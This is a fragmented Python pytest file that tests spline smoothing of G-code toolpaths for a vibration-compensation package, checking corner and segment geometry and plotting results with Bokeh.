"pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"= \"The start point of the spline segment is not on the end",
"np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea,",
"type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s,",
"checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10",
"+ np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10,",
"+ np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100",
"check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\"",
"the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <=",
"checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data",
"1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points",
"ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error)",
"+ np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10",
"check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def",
"s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1)",
"line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\",",
"test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\"",
"starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\",
"= data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point =",
"of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end",
"line segment end\" corner_error = \"The closest point of the corner is not",
"!= data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath",
"== pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1],",
"corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\",
"p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point):",
"Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data,",
"segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start))",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert",
"if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline",
"the spline segment is not on the middle of the line\" def check_end_point_middle(self):",
"0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1",
"check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data)",
"== \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"check_start_point_on(self): msg = \"The start point of the spline segment is not on",
"previous segment end distance and the current segment start do not match up\"",
"checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert",
"spline is before the line segment end\" corner_error = \"The closest point of",
"end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg =",
"= self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not end",
"line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self):",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert",
"test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert",
"pytest from numpy.testing import * import numpy as np import scipy as sp",
"X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"point of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point -",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end",
"msg = \"The end point of the spline segment does not match the",
"X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\"))",
"end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])",
"self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point",
"end_error_segment = \"The end point of the spline segment is not on the",
"= SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on()",
"the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length",
"elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start ==",
"Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert",
"== \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\":",
"read_gcode, Data import pytest from numpy.testing import * import numpy as np import",
"before the line segment end\" corner_error = \"The closest point of the corner",
"msg = \"The spline start distance does not match\" if line <= 1.0:",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4,",
"start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end ==",
"s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\")",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter):",
"\"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif",
"msg def check_start_point_start(self): msg = \"The start point of the spline segment does",
"check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\"",
"False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t),",
"self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The",
"l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\",",
"== \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data =",
"\"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end()",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ],",
"== \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\":",
"s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 +",
"abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the spline segment",
"checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle()",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data,",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1",
"x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0,",
"l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\")",
"self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) ==",
"generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"data self.s = s self.start = start self.end = end self.start_point = data.start_xy[l]",
"== 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data)",
"start point of the spline segment is not on the end of the",
"segment end\" corner_error = \"The closest point of the corner is not close",
"scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename =",
"Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
"- 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner:",
"\"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
"abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the",
"pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1",
"end=\"middle\") # Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\",",
"check_point_on_line(self): msg = \"The middle point of the spline segment is not on",
"X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12)",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\",",
"end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end",
"X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0,",
"- linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def",
"- lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5",
"segment is not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point,",
"from numpy.testing import * import numpy as np import scipy as sp import",
"1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is",
"test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\"",
"Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name",
"import read_gcode, Data import pytest from numpy.testing import * import numpy as np",
"not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line",
"self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The",
"spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\",
"the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self):",
"is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg",
"check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\"",
"= (lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid) class",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"start, end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on()",
"1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data)",
"end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data):",
"self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end",
"line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0],",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data)",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 +",
"exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode,",
"== \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data =",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1,",
"test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1",
"as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures():",
"data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data):",
"the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg",
"= (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0,",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret =",
"on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self):",
"match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The",
"pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the spline",
"end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l,",
"checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\" or end",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very short",
"- point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb,",
"= os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"end distance and the current segment start do not match up\" def check_corner_spline_order(self):",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline)",
"def check_line_start_point_end(self): msg = \"The start point of the spline segment is not",
"\"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert",
"self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start",
"check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\"",
"abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([",
"= \"The middle point of the spline segment is not on the line\"",
"type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if",
"if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The",
"\"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\"",
"def check_start_point_start(self): msg = \"The start point of the spline segment does not",
"np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start,",
"pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment",
"plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1",
"path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = []",
"msg = \"The middle point of the spline segment is not on the",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\")",
"checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start",
"> self.spline_mid, \\ \"The endpoint of the corner spline is before the line",
"def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01)",
"+ np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100",
"< 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]),",
"plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:,",
"pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"\".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode,",
"+ self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100,",
"+ np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data)",
"+ np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data =",
"the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def",
"= \"The end point of the spline segment is not on the middle",
"X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\")",
"from vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import numpy",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at",
"+ self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist,",
"if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length =",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0",
"check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\"",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request):",
"+ np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100",
"= start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l",
"pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([",
"import os from vibration_compensation import read_gcode, Data import pytest from numpy.testing import *",
"start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data, l=1, s=2,",
"data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200]))",
"pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1",
